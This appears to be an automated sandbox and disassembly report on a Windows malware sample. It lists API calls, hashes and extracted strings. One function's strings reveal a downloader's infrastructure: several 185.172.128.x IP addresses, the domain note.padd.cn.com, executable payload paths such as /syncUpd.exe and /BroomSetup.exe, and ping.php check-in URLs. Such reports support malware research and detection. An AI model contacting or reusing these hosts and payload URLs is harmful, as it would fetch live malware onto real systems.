Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A039 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94

Uniqueness

Uniqueness Score: -1.00%

Function 043AD58D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 043AD5DE

Memory Dump Source

Source File: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 043AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43ad000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 818d73bf39ceeb7fb59ff3957337efbc9364278c9f6c717621c13ba81c4d67a6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B8113C79A40208EFDB01DF98C985E98BBF5EF08350F098094F9489B362D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04344DA5 Relevance: 48.4, APIs: 1, Strings: 26, Instructions: 1192COMMON

Download Yara Rule

APIs

Part of subcall function 043465BB: __EH_prolog.LIBCMT ref: 043465C0

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 04344E6C

Part of subcall function 04346149: __EH_prolog.LIBCMT ref: 0434614E
Part of subcall function 04346149: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04346230

Strings

P, xrefs: 0434589C
note.padd.cn.com, xrefs: 04345B2C, 04345BE4, 04345CF5
/1/Qg_Appv5.exe, xrefs: 04345BFE, 04345CA4, 04345CFE
185.172.128.228, xrefs: 04345E3F, 04345EEB, 04345FF0
/syncUpd.exe, xrefs: 0434599E, 04345A20, 04345A7A
ten, xrefs: 043450ED, 04345103
/ping.php?substr=%s, xrefs: 0434572E, 04345804, 0434581C
seven, xrefs: 04345015, 04345043
nine, xrefs: 043450AD, 043450CF
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 04345177, 0434530D, 04345324
P, xrefs: 04345A82
185.172.128.228, xrefs: 04345667, 0434570D, 0434588C
185.172.128.59, xrefs: 043458E3, 0434597D, 04345A71
Qg_Appv5.exe, xrefs: 04345D52, 04345DD4
/BroomSetup.exe, xrefs: 04345F05, 04345FAB, 04345FF9
five, xrefs: 04344FA1, 04344FC3
P, xrefs: 04345D06
two, xrefs: 04344EE1, 04344EF7
eight, xrefs: 04345061, 0434508F
185.172.128.90, xrefs: 04345372, 0434540C, 0434545A
SOFTWARE\BroomCleaner, xrefs: 043454B0, 043455A4
P, xrefs: 0434546A
@, xrefs: 04344E13
one, xrefs: 04344EAB, 04344EC1
P, xrefs: 04346001
Installed, xrefs: 043455BE, 0434561C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$/1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$nine$note.padd.cn.com$one$seven$ten$two
API String ID: 2531350358-486824737
Opcode ID: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
Instruction ID: 7578a457fcc092577ad9695a05404d0bc4233edbce6684784e7b9270123b321e
Opcode Fuzzy Hash: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
Instruction Fuzzy Hash: F3A2033140B2F0AEF711B7785AD659E3FE51F63244FA474A9D4A13B363C958A20C839B

Uniqueness

Uniqueness Score: -1.00%

Function 0042099B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
IsValidCodePage.KERNEL32(00000000), ref: 00420B02
IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78

Strings

=CA, xrefs: 004209C4, 004209D4, 00420A94, 00420A36, 00420A2B, 00420A2E, 00420A39, 00420A97
0B, xrefs: 00420A54
=CA, xrefs: 004209B1, 00420B50
=CA, xrefs: 00420A7D, 00420A72, 00420AD0

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: 0B$=CA$=CA$=CA
API String ID: 745075371-1249640317
Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59

Uniqueness

Uniqueness Score: -1.00%

Function 00420063 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
_wcschr.LIBVCRUNTIME ref: 004201D5
_wcschr.LIBVCRUNTIME ref: 004201E3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286

Strings

0B, xrefs: 004200D6
DCA, xrefs: 0042015C, 004201A4, 0042024C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: 0B$DCA
API String ID: 4212172061-1121888207
Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768

Uniqueness

Uniqueness Score: -1.00%

Function 004207C7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E

Strings

OCP, xrefs: 0042081B
B, xrefs: 0042087E, 00420855
ACP, xrefs: 004207E5

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP$B
API String ID: 2299586839-1332025818
Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421682

Strings

1#IND, xrefs: 0042287A
1#INF, xrefs: 0042288F
1#QNAN, xrefs: 00422888
1#SNAN, xrefs: 00422881

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
Instruction ID: feac748cf68cf789a777818c524f5d4ea303f7336cb9653a69c72d87dadf9180
Opcode Fuzzy Hash: 17638643ea10bc5bb891a61e8cc370c95f07b47a5f39cff706a40dfb903f4f59
Instruction Fuzzy Hash: 74C25B71E046289FDB25CE28ED407EAB7B5EB94304F5441EBD80DE7250E7B8AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 04340A2E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,04340D4D,?,00000000), ref: 04340AC7
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,04340D4D,?,00000000), ref: 04340AF0
GetACP.KERNEL32(?,?,04340D4D,?,00000000), ref: 04340B05

Strings

OCP, xrefs: 04340A82
ACP, xrefs: 04340A4C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
Instruction ID: 02d5e7b6891a1fc240be978b8c65f461869f1555dd59e9e1ff55542364298acd
Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
Instruction Fuzzy Hash: 4A218C22B00104AAD7388F64C900AE772FBEFC4A74B569465EA0AD7180FB32FE41C394

Uniqueness

Uniqueness Score: -1.00%

Function 04340C02 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 04340D0E
IsValidCodePage.KERNEL32(00000000), ref: 04340D69
IsValidLocale.KERNEL32(?,00000001), ref: 04340D78
GetLocaleInfoW.KERNEL32(?,00001001,043345A4,00000040,?,043346C4,00000055,00000000,?,?,00000055,00000000), ref: 04340DC0
GetLocaleInfoW.KERNEL32(?,00001002,04334624,00000040), ref: 04340DDF

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
Instruction ID: d9ee1966d01a0edfa02339c1952dc23547ee6929f55aad0a9a207c20fdd7512c
Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
Instruction Fuzzy Hash: BB516F71B01219ABEB24EFA4DC40BFE77F8EF85700F545569EA04EB190EB70B9448B61

Uniqueness

Uniqueness Score: -1.00%

Function 043402CA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,043345AB,?,?,?,?,04334002,?,00000004), ref: 043403AC
_wcschr.LIBVCRUNTIME ref: 0434043C
_wcschr.LIBVCRUNTIME ref: 0434044A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,043345AB,00000000,043346CB), ref: 043404ED

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
Instruction ID: da533636871b1138219cf339cdb1ae27f46563944a9da46d2b01c571d836e7cc
Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
Instruction Fuzzy Hash: 4561E972700605ABE728AB74CC41BFA77FCEF84705F146469EA05DB581EA74F9448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00420326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398

Strings

=CA, xrefs: 0042032B
{B, xrefs: 0042036D

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: =CA${B
API String ID: 1084509184-2907596089
Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042044E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
Instruction ID: 67309229f61afd2ab5856e0fbe736b03e5ebd4e934039cb527c6d869dde023b9
Opcode Fuzzy Hash: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
Instruction Fuzzy Hash: F0619F71A00127ABDB28DF25EC82BBB77E8EF44314F50406AED05C6682E778D995CF58

Uniqueness

Uniqueness Score: -1.00%

Function 043309A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04330A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04330AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04330AB1

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
Instruction ID: 345e4a3f4c5facec6ad5387ddae28cdc4b999c7e9ec39bebac58bd5815040278
Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
Instruction Fuzzy Hash: C831C67490232C9BDB21DF68DD8879DBBB4BF08310F5051EAE41CA7250EB30AB858F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
Instruction ID: 9ac9671248c07c9c342bf92be5d06c8e759fe12cce2f5fd6b0acbfcbce77c00d
Opcode Fuzzy Hash: 2a6b36487532f31b8d986388ee74cfa6d586351b96011bf5ab536edd84df4d6c
Instruction Fuzzy Hash: 3531C3749012189BCB21EF25DD887CDB7B4BF08310F5041EAE41CA7291EB749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 04333C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,04333C24,00000003,00439450,0000000C,04333D7B,00000003,00000002,00000000,?,04332DD2,00000003), ref: 04333C6F
TerminateProcess.KERNEL32(00000000,?,04333C24,00000003,00439450,0000000C,04333D7B,00000003,00000002,00000000,?,04332DD2,00000003), ref: 04333C76
ExitProcess.KERNEL32 ref: 04333C88

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
Instruction ID: c514dd85b2f413d5b42ea62019556d2480ef19c0d8f45e2fcb6d07d4f880ce63
Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
Instruction Fuzzy Hash: EFE0B671101508AFCF216F64DE08A9A3F69FF44696B41D028FD068A231CB35EE63CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0432092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 04320966
., xrefs: 0432095F
GetProcAddress., xrefs: 043209DC, 043209DF, 043209E4

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: bef9d5f7d9e275209ba743373a184845bb6f72858210175552b4707499161a94
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 6F317CB6901629DFDB14CF99C980AADBBF9FF08324F14504AD541A7310D771FA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0433DC48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0433DDDB

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
Instruction ID: 614f399d95143116b3192e5e5ce4c3d2d829a138337a651691659834fe0ab3ac
Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
Instruction Fuzzy Hash: 873126719002496FDB249E78CC84EFB7BBDEF85315F1011A8F919D7290EA30B944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0041DB74

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54

Uniqueness

Uniqueness Score: -1.00%

Function 004203C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D

Strings

=CA, xrefs: 004203C6

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: =CA
API String ID: 1084509184-159236625
Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

